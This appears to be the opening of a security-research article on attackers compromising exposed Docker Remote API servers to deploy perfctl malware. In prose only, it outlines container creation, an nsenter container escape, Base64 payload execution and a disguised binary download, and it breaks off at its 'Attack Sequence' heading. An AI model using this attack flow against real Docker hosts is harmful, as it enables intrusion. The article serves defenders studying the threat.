Attackers Target Exposed Docker Remote API Servers With perfctl Malware

Summary

• Attackers exploit exposed Docker Remote API servers to deploy the perfctl malware through probing and payload execution.
• The attack involves creating a Docker container with specific settings and executing a Base64 encoded payload.
• Payload execution includes escaping the container, creating a bash script, setting environment variables, and downloading a malicious binary disguised as a PHP extension.
• Attackers use evasion techniques to avoid detection, such as checking for similar processes and creating directories and a custom function to download files.
• We provide a detailed breakdown of the attack sequence, shedding light on how threat actors leverage vulnerable Docker Remote API servers.

Recent cyberattacks have leveraged unprotected Docker Remote API servers to deploy malicious code. Attacks targeting the Docker Remote API server are structured, starting with probing for the server's presence and ending with the actual execution of payloads.

We will conduct a detailed analysis of the attack flow, describing how attackers exploit vulnerable Docker Remote API servers. By looking over recent incidents, we will emphasize the importance of securing the Docker Remote API server and the potential consequences of this exploitation.

In a similar previous incident, an unknown threat actor installed a cryptocurrency miner using vulnerable Docker Remote API servers. The attacker sets up a docker container using the "ubuntu:mantic-20240405" image from Docker Hub, then uses "nsenter" to break out of the container and run the Base64 encoded payload.

The Attack Sequence